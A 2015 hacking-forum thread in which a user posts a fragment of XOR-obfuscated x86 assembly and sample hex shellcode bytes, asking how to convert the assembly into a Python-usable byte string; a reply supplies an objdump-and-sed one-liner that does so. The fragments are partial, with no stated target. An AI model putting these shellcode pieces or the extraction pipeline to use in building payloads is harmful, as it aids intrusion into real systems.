October 19, 2017, 09:28:36 AM
Welcome, Guest. Please login or register.

The user's going to pick dancing pigs over security every time. -- Bruce Schneier

Author Topic: Converting shellcode.  (Read 1566 times)

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Converting shellcode.
« on: August 17, 2015, 06:30:52 PM »
Alright guys so i got some obfuscated shellcode that i want to use in python. However to do so i must convert it from asm like this:

Code: [Select]
push 0x22657841
pop eax
shr eax,0x08
push eax
mov eax,0x1d4f211f
mov ebx,0x78614473
xor eax,ebx
push eax
mov eax,0x3c010e70
mov ebx,0x5567524a
xor eax,ebx
push eax
mov eax,0x3c481145
mov ebx,0x78736c6c

To something like this:

Code: [Select]
\x63\x6b\x72\x59\xf6\x58\xa5\xfe\x3f\x0b\x41\xa0\xf2
\xfe\x2d\xc9\x32\x3d\xd4\x51\xf7\xa7\x56\xf8\x69\x08
\x4d\x27\x8a\x2e\x19\x99\x7c\xfc\x63\xfa\x5c\xd5\xa8
\x1f\xa8\x9b\x88\xbb\xa5\x3c\x8f\x7f\x38\x45\xd1\x71

Unfortunately i have no idea how i should go about doing so and i was wondering if you could lend me a hand.
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline w33nd0x

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 113
  • Internets: +19/-0
Re: Converting shellcode.
« Reply #1 on: August 17, 2015, 08:37:35 PM »
Use this:

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

So replace "PROGRAM" with the binary asm file and it should spit out the useable shellcode via objdump.

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: Converting shellcode.
« Reply #2 on: August 18, 2015, 11:27:21 AM »
Use this:

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

So replace "PROGRAM" with the binary asm file and it should spit out the useable shellcode via objdump.

Nice, thanks man.
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline null_void

  • Top Hat Member
  • Enthusiast
  • ********
  • Posts: 51
  • Internets: +2/-0
Re: Converting shellcode.
« Reply #3 on: August 24, 2015, 03:35:02 PM »
Nice I will uses this also if you do not mind. Thanks
The most powerful weapon you have is knowledge! They may take your life but the can never take what is inside your mind.